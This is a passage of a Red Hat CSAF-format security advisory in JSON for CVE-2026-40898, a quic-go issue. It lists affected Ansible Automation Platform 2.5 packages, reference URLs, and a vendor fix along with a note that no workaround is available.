"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40898"
},
{
"category": "external",
"summary": "RHBZ#2484875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40898",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40898"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1",
"url": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9",
"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9"
}
],
"release_date": "2026-06-04T17:43:36.803000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
